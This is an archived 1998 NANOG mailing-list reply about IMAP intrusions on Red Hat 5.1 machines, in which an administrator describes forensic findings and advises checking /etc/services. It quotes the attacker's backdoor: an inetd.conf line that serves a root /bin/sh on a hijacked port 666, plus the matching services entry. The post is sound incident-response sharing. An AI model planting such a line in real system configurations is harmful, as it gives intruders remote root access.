Merit Network
 Can't find what you're looking for? Search the Mail Archives.
  About Merit   Services   Network   Resources & Support   Network Research   News   Events   Home

Discussion Communities: Merit Network Email List Archives
North American Network Operators Group
Date Prev | Date Next | Date Index | Thread Index | Author Index | Historical

Re: IMAP attacks continue

  • From: Phil Howard
  • Date: Mon Nov 23 17:03:16 1998 
An addendum to:

> I found a machine that had Red Hat 5.1 unmodified running on it, and it
> got hit.  So I closed things off and looked around for damage and found
> the following:
> 
> 1.  Syslogd had been killed off and the syslog file deleted.
> 
> 2.  A backdoor was installed in /etc/inetd.conf as follows:
> 
> ttalk   stream  tcp     nowait  root    /bin/sh         sh -i

I checked the ports assignments from IANA and there is no such thing as
"ttalk".  I found this line in /etc/services:

ttalk           666/tcp

so it appears to be hijacking the port used by (as seen in the file
ftp://ftp.iana.org/in-notes/iana/assignments/port-numbers):

mdqs            666/tcp
mdqs            666/udp
doom            666/tcp    doom Id Software
doom            666/udp    doom Id Software

So also check /etc/services on any potentially compromised machines.

-- 
 --    *-----------------------------*      Phil Howard KA9WGN       *    --
  --   | Inturnet, Inc.              | Director of Internet Services |   --
   --  | Business Internet Solutions |       eng at intur.net        |  --
    -- *-----------------------------*      philh at intur.net       * --


Discussion Communities


About Merit | Services | Network | Resources & Support | Network Research
News | Events | Contact | Site Map | Merit Network Home


Merit Network, Inc.